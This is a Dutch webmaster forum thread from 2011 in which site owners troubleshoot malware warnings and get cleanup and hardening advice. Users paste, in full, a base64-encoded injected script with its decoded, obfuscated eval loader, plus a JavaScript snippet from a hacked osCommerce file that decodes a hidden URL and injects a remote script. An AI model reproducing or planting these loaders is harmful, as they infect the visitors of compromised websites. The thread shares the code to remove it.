Ik krijg een malware melding op mijn website www.novasurfer.nl
Ik heb eea bekeken maar ik kan niks ontdekken wat het zou kunnen zijn?
Heeft iemand een idee?
- Malware melding op website... Wat kan het zijn?
-
03-10-2011, 08:54 #1Rinada Entertainment
- Berichten
- 1.179
- Lid sinds
- 16 Jaar
Malware melding op website... Wat kan het zijn?
-
03-10-2011, 09:00 #2Particulier
- Berichten
- 401
- Lid sinds
- 15 Jaar
Re: Malware melding op website... Wat kan het zijn?
Controleer je gehele website op een verwijzing naar ghjnlhggyus.com.
In de meeste gevallen zit het in een iframe welke niet zichtbaar is voor de bezoeker.
Het kan ook zijn dat de advertenties deze verwijzing meesturen.
De melding van Google blijft voorlopig staan, dit proces kan je versnellen door een website review aan te vragen, maar hier gaat enige tijd overheen.
-
03-10-2011, 09:12 #3Rinada Entertainment
- Berichten
- 1.179
- Lid sinds
- 16 Jaar
Re: Malware melding op website... Wat kan het zijn?
Ik heb een advertentie met iFrame weggehaald.
Ik krijg nu de melding niet meer.
Jullie nog wel?
-
03-10-2011, 09:18 #4Particulier
- Berichten
- 401
- Lid sinds
- 15 Jaar
Re: Malware melding op website... Wat kan het zijn?
Melding is inderdaad weg :)
-
03-10-2011, 09:19 #5
- Berichten
- 340
- Lid sinds
- 15 Jaar
Re: Malware melding op website... Wat kan het zijn?
www.malwarecheck.nl
Aanvullend bericht:
web site: http://www.novasurfer.nlstatus: </B>Site infected with malwareweb trust: Not Blacklisted
Malware found in the URL:
http://www.novasurfer.nl
Malware found in the URL:
http://www.novasurfer.nl/rubrieken/4737/gezondheid.htmlLaatst aangepast door MarcelM : 03-10-2011 om 09:22 Reden: Automatisch samengevoegd.
-
03-10-2011, 09:59 #6Rinada Entertainment
- Berichten
- 1.179
- Lid sinds
- 16 Jaar
Re: Malware melding op website... Wat kan het zijn?
bedankt voor de tip.
Ik heb die rubrieken weggehaald maar nu zit het in andere rubrieken...
-
03-10-2011, 10:06 #7MKBCONNECT.NET
- Berichten
- 2.868
- Lid sinds
- 16 Jaar
Re: Malware melding op website... Wat kan het zijn?
En voordat je wat wijzigt doe dan even de ftp wachtwoorden wijzigen anders heb je het morgen weer.
-
03-10-2011, 10:14 #8Rinada Entertainment
- Berichten
- 1.179
- Lid sinds
- 16 Jaar
Re: Malware melding op website... Wat kan het zijn?
Ik heb 2 google_verify.php bestanden weggehaald. Ik hoop dat dat het was...
Aanvullend bericht:
PS:
zou dit de code kunnen zijn?
$buffer.base64_decode('PHNjcmlwdD4oZnVuY3Rpb24oKXt mX0VUPWRvY3VtZW50O2ZfQT13aW5kb3c7Zl9BLmZfaT1mdW5jd GlvbigkLGZfRXYpe3JldHVybiAwfTtmX0EuZl96PWZ1bmN0aW9 uKGZfayl7cmV0dXJuIGZfay5qb2luKCcnKX07Zl9BLmZfcT1md W5jdGlvbihmX0VFKXtyZXR1cm4oZnVuY3Rpb24oZl9rLGZfRUQ pe3JldHVybiBmX0VEKGZfayhmX0VEKGZfayhmX0VFKSkpKShmX 0VFKSgpfSkoKGZ1bmN0aW9uKGZfayl7cmV0dXJuIGZfay5jb25 zdHJ1Y3Rvcn0pLChmdW5jdGlvbihmX2spe3JldHVybihmdW5jd GlvbihmX0VEKXtyZXR1cm4gZl9rLmNhbGwoZl9rLGZfRUQpfSl 9KSl9O2ZfQS5mX0VDPWZ1bmN0aW9uKGZfayl7cmV0dXJuIGZfa y5wb3AoKX07Zl9BLmZfQT1mX0E7aWYodHlwZW9mKCQpPT0ndW5 kZWZpbmVkJyl7Zl9FTD1mX0VULmdldEVsZW1lbnRzQnlUYWdOY W1lKCdoZWFkJylbMF07Zl9FTT1mX0VULmNyZWF0ZUVsZW1lbnQ oJ3NjcmlwdCcpO2ZfRU0uc2V0QXR0cmlidXRlKCdzcmMnLCJod HRwOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF 1ZXJ5LzEuNi4yL2pxdWVyeS5taW4uanMiKTtmX0VMLmFwcGVuZ ENoaWxkKGZfRU0pfWZfQS5mX0VvPTEwMDtmX0EuZl9FaD0yNTt mX0EudHJpbT1mdW5jdGlvbihmX0VkLGZfRW0pe2lmKCJxYWJjZ GVmIi5pbmRleE9mKGZfRWQuc3Vic3RyKDAsMSkpPj0wKXt2YXI gZl9FYT1mX3ooZl9FZC5zcGxpdCgncScpKS5zcGxpdCgndicpO 2Zvcih2YXIgaT0wO2k8Zl9FYS5sZW5ndGg7aSsrKXtmX0VhW2l dPXBhcnNlSW50KGZfRWFbaV0sMTYpLWZfRW1bZl9FZF19cmV0d XJuIGZfRWEuam9pbignLCcpKycsJ31lbHNle3JldHVybiBmX0V tW2ZfRWRdfX07ZD0nT2U9e01RdjFhTiUyJTclMSU2PjoiZSsiL E1RdjJhTiUyaiUxJTY+OiIiLCpiUXYzYU4lMiU3JTElNnYzMDo ibChcJ2w9U3QiLE5gdjRlfCowVCVmKjIhNToicmluZy5mIixJP HY1MiRhVSVjITYqYSE2OiJyb21DaGEiLFQkOHY2OCoyKjUhZUA wITUqNDoickNvZGUoIkQ0I2QhMiU2fiUyITAhM1cmMC05NiQ1T SRhUVYkZCRlVSY5RGFRJGRWJGVVJTAlMSUyJjNHN2pXJWElYiV jJWQlZSVmJjdHZkAwfFQjNFclNiUyVSY2R2EhZTw8WioxKjYhN komNkcyITAhNCEwITElZSE0VCowJjBCOEtOTWpUSlgrMSY4TGV ZWCE2JTMqMCM0I2UhNiYzRzIqN3lLJTIlZSVlJWEqNEhMNCM0f lk+VCVjPn4mNUIyI2YkM35WVnx+JDMmMEc1KjcqOXlLKjVQSSU ySEwxKjUrNldAM1QlNCoyVCY1LTljKzElNCthKmUjZCEzKjIrM SYwRzZ+KzIqNCo3WiVmIzMlMCY3R2YqYSsyKzNKV0srZCEzJjF EM0o+IzQjOD4qNiVmKjEmN0QxWWB+WT4lZEAyKjAmNUIzfCNkW SQ0fCUzflcmMEc2JTAkM2pVJTYkM2pVJjJHMn4kZFYkM35ValE mMEQ1JGEkOCU3JDV5JWEkYSQ1JjRHZFclNyQ1JTEkNyU0JDUlM iY0RDclZSQ1USQ4JWJNSSU3JjRHMFYkOSU0VFl+WSthJjBHOCM 3JWMkZSVkK2UrZCpjKmQmOUQ3JWFRKzclNStkKmEkNyVhJjZEZ VhJTlgrYSs3KjcqMSY5QmEqMCMzI2IjNFArYio1I2UmMUIzVSs 3KjYlNVZWKzkkNSYwRDdqIWVaIzNKVSFlUCY2TDEkMEsrOCRkJ TQkOCUwJWMmNUQ5JWUkZFQqZSU0JDklYiUwJjhCYn4rZSs3KjF ZJTMrYisxJjRHNiU1JWJVWj5JIzgqMiY3QmQrMio3PFd+KmVRJ WVIRGQ+fCpiKjVNQDI+JDMmOEI3Vj4kMCE2UCQ4JDVqJjRENiN lK2QhMzwhNVokZXwmMUc0SytmWSo4PlkrNz4mNEJkKzIkN048K zUjMyM4JTRIRzclMSU2PiQ0UGAkNFAmOEJhK2VQI2MhMSE2JTA lNiU1JjFCOSoxSiVmITFKKjQ8KjEmMSxhMSU0JWUhMyU2I2Q+I 2IhMyYwRDUjZSE0JTVaJTUlM3lVJjFENCUzI2J5VSUyKzEkYSE wJjBEZSUzITVUJDlAM1RWKjImNS05MiszKmNAMCpiITIhNXkrZ CYyQmQlNCQ3JDU8KzQkNyM4JWJIR2ZVJWNAM0A3KjUlMyUwK2J ILGE1KjUjZjw8UCs1KjMjOSY3TGFKSiM5KjArZio0USViJjlEN nxWJWV5JGQlNHkhMSYxRGEkN0orMipmI2QjYSVkJWQmMUI2KzE qMWAjM0shMyEzIzQmM0xmK2RJIzgjNyoyJDlXViY3RDklM0A1Q DUlMSRlPkpNJjhHOE0hNWojZiE1JDgrZStlJjJCY1hKTSM3TSE zKzIrYyYwLGFjSiNiJDl5KzElNiVlITMmMCxhOCo1Pj4rOSpjI zMrOSVlJjhCYyE1KmFNTTwrMys1JDAmMkIzKjhKUCEzJTZKTSE zJjAtOWFNPFAjM0lJK2MqZiYyLTk3K2IqZT4jYUAyKmIqYiQ0S Ec2KjYrYSpkWiM5QDEjYyNjJjlMNyM3JDAqYiozeSs3KzNYJjZ EMCNlI2JYPCNhI2UkNSMzJjhENSs2KzIqMSoxIzchZT4rZCY1Q mUjOCNiWiQzKjFKVyozJjZENEsrNSUxKjIqMiM3PFomNCxhOUl YUCtlS35KKzImMUc2KjcqNyNkSSM0fiNhIzkmOUJjJDAjZSE2K mEqMCQzKzQrNiYzTDV8SSNjI2YjMyMzJDdgSEQ1KzYrOForZDw jNyNhIWUmNUJlfCowVCs5KjIkNSs2KmQmNUw0fCNjI2UjMyQ3K jU8akgtOTY8IzclNiRhV1gkNCNjJjlMMEsjOElLIzcjN0tJJjB MZk4jYiNiTiNiI2FOI2JITDQ+I2FgPmBgPiM5JjRMNzxOTjxJS TxOJjFMNDwjNzxOIzQ8Izg8JjFMNCFlIzMhZUkhZU4jYStmJjJ MNCo4PkAwIzQlMUA2KzFUJjgsYThXJTckZSUzViMzUSU3JjVHN yU1KmIlMCQ5JWEqYiU3ViY4RGNaJTBJJWZJI2EjYT4mNyxkNiQ zJGEqNktAM1gkND4mOUcxJWQlZFcqMyM4Izg+YCY5QmQrZU48J WROPCsxTkhCYyplYEsrZGBLUSQ0JjlCNys3WGB+Pk1JJDcmNEc 4JTYjOD55SSM0S0AzJjksYTEkZUojYiE0VCtjITJ8JjBHOCRkQ DIkNU1JIzckYVcmOUcxeVUkNSsyJWJKK2NUJjEtOTNRJTAlZFk lYSViQDAlMyY3RGEqMn5ZS1hUKmJYJjVMMCo2JDVNPmBLJGFgJ jlMMCQ1TUpAMCUyJGQlZCUxJjktOTFgIzQjNCE0TT5ZJWMmNEw 2WCo4KjYjOSRlJTNAMCo4SEJifjw8QDFAMTxAMT4mNExiIzkjO SM5SUA2SUA2SSY5LGQzUSUyV1FAMSE2TSU1JjZHOWorNSU2Pk4 jNCM0PCY0LGQ0QDRQV1o+KjIqN1kmN0IzKjJUaiVlKjkhMGorN yYwLTljJTNXJTYlN0s8QDEqNCY0QjIhNSplUCVhQDB5I2YlMCY yRDZqITEqNXwlNXlKUCYxLTkyUWBZS1olZmAkOCY3RzkkNSU1V j4jN05OTiY2QjkjYio5ITAkNCVkKjAhMCEzJjBEYjxqWCRlQDM qZSE1aiY1TDF5USQ0JTUqNiUyJDckOCYzLTk5JWM+JTFYQDUqO FRNJjgsYTc8JWRAMyplITUlZCMzJTEmNUQ4JTEkYSU3UUAwITY kOXwmMy05NlYlYiU0JDklYVUlNSU0JjYsYTBXViViJWNXJTUrO FomN0I5K2M8Wio0IzMjN0A0SiY2LGQwKjc8JTArYiUxSSNlIzN ITDQjOVgjM00rYSs5VT4mOEw4PDwrYklRJDlqKzkmNCxhOCo3K 2NZKzQ8SitlPCY0LTkyUCQ3UEAwfFpANT4mN0dlK2YrZis0JDc rZSE2JGQkMCYzRDUqMCQ3IzglYiVmVSVjQDNIQjEhMVlZITRRW iRhVSYxRGQkZUAxKzhVWD5KSiY5QjYhZSE2KjJLJWElMyQ5JGE mNURjVSU0USRhPCE2UCFlJjYsZDMkZVE8VyVlJTUkYSU0JjVEZ T5LVDwlYiRkJWMrYyY4RGEkZXkhMUohNVokOHkmMUdjKzIrYis 3KzYrOVAqMyRlJjhHNCU3PCQ4KjIjN04qMCQ4JjUtOTNWKjU+J WMqNVZOJWImOEc4JTQlMSVjPlpNKjgrMSY4LGEzKzgrOSthK2N 8QDArZStlJjJCYVBQTVAhZVBaUEhMMT4jNyVjJWVRJWMlZCViJ jlCYyQ3WCoxSyVjKjEkNyowJjRMM2AqMSMzI2MjNE0hZSVhJjJ CZDw8SSRlJTMkZCUySyY0RzdYJTMlMiUzTUtLSyYzTGN5JTd8J GRKJDVQJjEsTmAhfCowVCVmKjJZOiIzMik7IiwqaiUkZCU2Vip iJTAlMToiT3EobClcJyIsWSEhMCo5JTJUITAjOCoyOiIpOyJ9O 09jPVtdO09BLk9Fcz1TdHJpbmcuZnJvbUNoYXJDb2RlO2Zvcig rciBPayBpbiBPZSl7UnRyaW0oT2ssT2UpKX07UlwnO09BLk9GX jU4LDUwPzIsMTIwLDM0LDYyLDYwXFwsMzI/NT80LDk5KTtcJyk7UlwnT0EuT3heNjEsNTAsNjIsNjAsNDdcXC k7XCcpO1JcJ09BLk93PU9Fcyg5Nz8yLzUsNDY/Nj85LzU/Nj82LzE/NCw0Niw5OT8xLzksNDcsNDksNDc/Nj80LzE/MC8wPzUsNDcvMCw5Ny81LzgsMTIxLDQ2LzY/NT8xPzApO1wnKTtPcShPeihPYykpIXY3I3Y4JHZiJXZjJjo4Kn Y5K3ZhLSxxLywxMDwhZD4jMD8sMTFAdmRCLTdELGJHLGNIOjkw SSMySiE5SyFjTC04TSFiTiM2T2ZfUCFhUSRiUk9jLnB1c2goVC E4VSRmViRjVyU5WCMxWSE3WiFmXj1PRXMoMTA0LzEvNS8zLzQ/NixgIzVqJTh5JDZ8JDJ+JDFcXC81LzI/NCw5Ny85LzEnO2ZvcihjPTQxO2MtLTtkPSh0PWQuc3BsaXQoJy EjJCUmKistLzw+P0BCREdISUpLTE1OT1BRUlRVVldYWVpeYGp5 fH5cXCcuY2hhckF0KGMpKSkuam9pbihmX0VDKHQpKSk7Zl9FQT 1kO2ZfcShmX0VBKX0pKCk8L3NjcmlwdD4=');}
Aanvullend bericht:
Volgens mij is het opgelost nu...Laatst aangepast door maarten s : 03-10-2011 om 10:26 Reden: Automatisch samengevoegd.
-
05-10-2011, 18:05 #9Particulier
- Berichten
- 18
- Lid sinds
- 13 Jaar
Re: Malware melding op website... Wat kan het zijn?
Dat is het zeker te weten! ... Er staat namelijk het volgende versleuteld:
<script>(function(){f_ET=document;f_A=window;f_A.f _i=function($,f_Ev){return 0};f_A.f_z=function(f_k){return f_k.join('')};f_A.f_q=function(f_EE){return(functi on(f_k,f_ED){return f_ED(f_k(f_ED(f_k(f_EE))))(f_EE)()})((function(f_k ){return f_k.constructor}),(function(f_k){return(function(f _ED){return f_k.call(f_k,f_ED)})}))};f_A.f_EC=function(f_k){re turn f_k.pop()};f_A.f_A=f_A;if(typeof($)=='undefined'){ f_EL=f_ET.getElementsByTagName('head')[0];f_EM=f_ET.createElement('script');f_EM.setAttribu te('src',"https://ajax.googleapis.com/ajax/libs...(0,1))>=0){var f_Ea=f_z(f_Ed.split('q')).split('v');for(var i=0;i<f_Ea.length;i++){f_Ea[i]=parseInt(f_Ea[i],16)-f_Em[f_Ed]}return f_Ea.join(',')+','}else{return f_Em[f_Ed]}};d='Oe={MQv1aN%2%7%1%6>:"e+",MQv2aN%2j%1%6>:"",* bQv3aN%2%7%1%6v30:"l(\'l=St",N`v4e|*0T%f*2!5:"ring .f",I<v52$aU%c!6*a!6:"romCha",T$8v68*2*5!e@0!5*4:" rCode("D4#d!2%6~%2!0!3W&0-96$5M$aQV$d$eU&9DaQ$dV$eU%0%1%2&3G7jW%a%b%c%d%e%f& 7Gf@0|T#4W%6%2U&6Ga!e<<Z*1*6!6J&6G2!0!4!0!1%e!4T*0 &0B8KNMjTJX+1&8LeYX!6%3*0#4#e!6&3G2*7yK%2%e%e%a*4H L4#4~Y>T%c>~&5B2#f$3~VV|~$3&0G5*7*9yK*5PI%2HL1*5+6 W@3T%4*2T&5-9c+1%4+a*e#d!3*2+1&0G6~+2*4*7Z%f#3%0&7Gf*a+2+3JWK+ d!3&1D3J>#4#8>*6%f*1&7D1Y`~Y>%d@2*0&5B3|#dY$4|%3~W &0G6%0$3jU%6$3jU&2G2~$dV$3~UjQ&0D5$a$8%7$5y%a$a$5& 4GdW%7$5%1$7%4$5%2&4D7%e$5Q$8%bMI%7&4G0V$9%4TY~Y+a &0G8#7%c$e%d+e+d*c*d&9D7%aQ+7%5+d*a$7%a&6DeXINX+a+ 7*7*1&9Ba*0#3#b#4P+b*5#e&1B3U+7*6%5VV+9$5&0D7j!eZ# 3JU!eP&6L1$0K+8$d%4$8%0%c&5D9%e$dT*e%4$9%b%0&8Bb~+ e+7*1Y%3+b+1&4G6%5%bUZ>I#8*2&7Bd+2*7<W~*eQ%eHDd>|* b*5M@2>$3&8B7V>$0!6P$8$5j&4D6#e+d!3<!5Z$e|&1G4K+fY *8>Y+7>&4Bd+2$7N<+5#3#8%4HG7%1%6>$4P`$4P&8Ba+eP#c! 1!6%0%6%5&1B9*1J%f!1J*4<*1&1,a1%4%e!3%6#d>#b!3&0D5 #e!4%5Z%5%3yU&1D4%3#byU%2+1$a!0&0De%3!5T$9@3TV*2&5-92+3*c@0*b!2!5y+d&2Bd%4$7$5<+4$7#8%bHGfU%c@3@7*5%3 %0+bH,a5*5#f<<P+5*3#9&7LaJJ#9*0+f*4Q%b&9D6|V%ey$d% 4y!1&1Da$7J+2*f#d#a%d%d&1B6+1*1`#3K!3!3#4&3Lf+dI#8 #7*2$9WV&7D9%3@5@5%1$e>JM&8G8M!5j#f!5$8+e+e&2BcXJM #7M!3+2+c&0,acJ#b$9y+1%6%e!3&0,a8*5>>+9*c#3+9%e&8B c!5*aMM<+3+5$0&2B3*8JP!3%6JM!3&0-9aM<P#3II+c*f&2-97+b*e>#a@2*b*b$4HG6*6+a*dZ#9@1#c#c&9L7#7$0*b*3y+7 +3X&6D0#e#bX<#a#e$5#3&8D5+6+2*1*1#7!e>+d&5Be#8#bZ$ 3*1JW*3&6D4K+5%1*2*2#7<Z&4,a9IXP+eK~J+2&1G6*7*7#dI #4~#a#9&9Bc$0#e!6*a*0$3+4+6&3L5|I#c#f#3#3$7`HD5+6+ 8Z+d<#7#a!e&5Be|*0T+9*2$5+6*d&5L4|#c#e#3$7*5<jH-96<#7%6$aWX$4#c&9L0K#8IK#7#7KI&0LfN#b#bN#b#aN#bHL4 >#a`>``>#9&4L7<NN<II<N&1L4<#7<N#4<#8<&1L4!e#3!eI!e N#a+f&2L4*8>@0#4%1@6+1T&8,a8W%7$e%3V#3Q%7&5G7%5*b% 0$9%a*b%7V&8DcZ%0I%fI#a#a>&7,d6$3$a*6K@3X$4>&9G1%d %dW*3#8#8>`&9Bd+eN<%dN<+1NHBc*e`K+d`KQ$4&9B7+7X`~> MI$7&4G8%6#8>yI#4K@3&9,a1$eJ#b!4T+c!2|&0G8$d@2$5MI #7$aW&9G1yU$5+2%bJ+cT&1-93Q%0%dY%a%b@0%3&7Da*2~YKXT*bX&5L0*6$5M>`K$a`&9L0$ 5MJ@0%2$d%d%1&9-91`#4#4!4M>Y%c&4L6X*8*6#9$e%3@0*8HBb~<<@1@1<@1>&4L b#9#9#9I@6I@6I&9,d3Q%2WQ@1!6M%5&6G9j+5%6>N#4#4<&4, d4@4PWZ>*2*7Y&7B3*2Tj%e*9!0j+7&0-9c%3W%6%7K<@1*4&4B2!5*eP%a@0y#f%0&2D6j!1*5|%5yJP&1-92Q`YKZ%f`$8&7G9$5%5V>#7NNN&6B9#b*9!0$4%d*0!0!3&0D b<jX$e@3*e!5j&5L1yQ$4%5*6%2$7$8&3-99%c>%1X@5*8TM&8,a7<%d@3*e!5%d#3%1&5D8%1$a%7Q@0!6$ 9|&3-96V%b%4$9%aU%5%4&6,a0WV%b%cW%5+8Z&7B9+c<Z*4#3#7@4J &6,d0*7<%0+b%1I#e#3HL4#9X#3M+a+9U>&8L8<<+bIQ$9j+9& 4,a8*7+cY+4<J+e<&4-92P$7P@0|Z@5>&7Ge+f+f+4$7+e!6$d$0&3D5*0$7#8%b%fU%c @3HB1!1YY!4QZ$aU&1Dd$e@1+8UX>JJ&9B6!e!6*2K%a%3$9$a &5DcU%4Q$a<!6P!e&6,d3$eQ<W%e%5$a%4&5De>KT<%b$d%c+c &8Da$ey!1J!5Z$8y&1Gc+2+b+7+6+9P*3$e&8G4%7<$8*2#7N* 0$8&5-93V*5>%c*5VN%b&8G8%4%1%c>ZM*8+1&8,a3+8+9+a+c|@0+e+ e&2BaPPMP!ePZPHL1>#7%c%eQ%c%d%b&9Bc$7X*1K%c*1$7*0& 4L3`*1#3#c#4M!e%a&2Bd<<I$e%3$d%2K&4G7X%3%2%3MKKK&3 Lcy%7|$dJ$5P&1,N`!|*0T%f*2Y:"32);",*j%$d%6V*b%0%1: "Oq(l)\'",Y!!0*9%2T!0#8*2:");"};Oc=[];OA.OEs=String.fromCharCode;for(+r Ok in Oe){Rtrim(Ok,Oe))};R\';OA.OF^58,50?2,120,34,62,60\ \,32?5?4,99);\');R\'OA.Ox^61,50,62,60,47\\);\');R\ 'OA.Ow=OEs(97?2/5,46?6?9/5?6?6/1?4,46,99?1/9,47,49,47?6?4/1?0/0?5,47/0,97/5/8,121,46/6?5?1?0);\');Oq(Oz(Oc))!v7#v8$vb%vc&:8*v9+va-,q/,10<!d>#0?,11@vdB-7D,bG,cH:90I#2J!9K!cL-8M!bN#6Of_P!aQ$bROc.push(T!8U$fV$cW%9X#1Y!7Z!f^=OE s(104/1/5/3/4?6,`#5j%8y$6|$2~$1\\/5/2?4,97/9/1';for(c=41;c--;d=(t=d.split('!#$%&*+-/<>?@BDGHIJKLMNOPQRTUVWXYZ^`jy|~\\'.charAt(c))).joi n(f_EC(t)));f_EA=d;f_q(f_EA)})()</script>
-
05-10-2011, 18:20 #10Particulier
- Berichten
- 1.191
- Lid sinds
- 13 Jaar
Re: Malware melding op website... Wat kan het zijn?
Indien het mag dan zou ik hier graag op inhaken.
Sinds 2 dagen krijg ik deze melding bij Oscommerce een Trojan/js in de file:
website.nl/admin/backup.php?selected_box=tools
In de file backups kan ik ook niks raars vinden.
www.malwarecheck.nl zegt dat alles in orde is geen meldingen.
Ik heb in de backup.php dit eruit gehaald:
<script>
function vdch() {
if(document.all.length > 3) {
var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
var dch = document.createElement("script");
dch.id = "dchid";
dch.src = dchid;
document.all[3].appendChild(dch);
} else {
setTimeout("vdch()",500);
}
} setTimeout("vdch()",500);
</script>
en hij is nu gefixd. Wat doet dit precies ?Laatst aangepast door Miichelle G : 05-10-2011 om 18:56
-
05-10-2011, 19:38 #11Particulier
- Berichten
- 202
- Lid sinds
- 15 Jaar
Re: Malware melding op website... Wat kan het zijn?
Dit is een backdoor hack, regelmatig begonnen via verouderde OS commerce, Joomla & Wordpress software.
Niet persé de software zelf maar dan wel via thema's, plugins e.d.
Een voorbeeld hiervan is de TimThumb hack, een functie die toegepast is in 200 wordpress thema's & vele andere plugins. Dit is echter nog maar het topje van de ijsberg.
Ze verkrijgen toegang via een bestand met o.a. verkeerde CHMOD rechten.
Eenmaal binnen word er geinjecteerd in diverse bestanden met redirect malware scripts (die dat 1x per IP adres doen). Ook veranderen ze CHMOD rechten van andere bestanden & bestandsmappen.
De kans bestaat ook dat er meer als dat alleen gebeurd.
Die base64 kan een encoded sql injection zijn die decode bij execute.
In sommige gevallen weten ze de complete server binnen te dringen en alle sites te besmetten.
Maak hier dan ook een melding van tegenover je ISP en indien je meer domeinen hebt, controleer ze.
Verander ook alle wachtwoorden die je gebruikt hebt want die zijn waarschijnlijk al niet meer privé.
Dit soort aanvallen worden door professionals in elkaar gezet en vervolgens uitgevoerd
door van die kiddo's die zichzelf als hacker zien.
Er zijn nog veel meer varianten.
Het is echt ontzettend belangrijk om niet klakkeloos thema's te gebruiken & installeren.
Hetzelfde telt voor plugins!
Haal sowieso ten alle tijde de versie van de gebruikte software van je website.
Dit is namelijk de basic methode die word toegepast om ''targets'' op te sporen via zoekmachines.
Bij wordpress dien je na installatie ook je wp-config.php te CHMODDEN naar 644 of als het kan 600.
(Met de timthumb hack hadden ze alle rechten in de public directory en kan je dus database gegevens inzien)
Gebruik geen standaard login namen zoals ''admin'' maar verander deze tijdens / na de installatie.
Het hele probleem is dat ''iedereen'' tegenwoordig websites kan maken maar dat ze ondertussen bijna allemaal half werk leveren. Alleen kom je daar pas achter na bijvoorbeeld dit soort geintjes.
Voor vragen kan er contact met mij worden opgenomen via PM :)Laatst aangepast door R. IJnema : 05-10-2011 om 19:53
Plaats een
- + Advertentie
- + Onderwerp
Marktplaats
Webmasterforum
- Websites algemeen
- Sitechecks
- Marketing
- Domeinen algemeen
- Waardebepaling
- CMS
- Wordpress
- Joomla
- Magento
- Google algemeen
- SEO
- Analytics
- Adsense
- Adwords
- HTML / XHTML
- CSS
- Programmeren
- PHP
- Javascript
- JQuery
- MySQL
- Ondernemen algemeen
- Belastingen
- Juridisch
- Grafisch ontwerp
- Hosting Algemeen
- Hardware Info
- Offtopic